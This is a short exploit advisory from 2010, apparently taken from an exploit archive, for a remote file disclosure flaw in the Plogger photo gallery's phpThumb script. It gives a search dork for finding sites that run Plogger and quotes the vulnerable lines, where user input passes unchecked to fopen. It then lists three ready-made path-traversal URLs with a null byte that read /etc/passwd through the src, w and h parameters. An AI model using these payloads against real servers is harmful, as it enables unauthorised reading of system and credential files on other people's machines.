Plogger Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Plogger Remote File Disclosure Vulnerability
# Published : 2010-08-13
# Author : Mr.tro0oqy
# Previous Title : Get Tube All Versions SQL Injection Vulnerability
# Next Title : Kleeja Upload - CSRF Change Admin Password

# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker) 
# email : t.4@windowslive.com

exp : 

Line 117:   if ($fp_source = @fopen($_GET['src'],'rb'))

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00

Line 41: 	$_GET['w'] = $matches[1];
Line 42: 	$_GET['h'] = $matches[2];

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00


greetz : all muslems (ramadan kreem)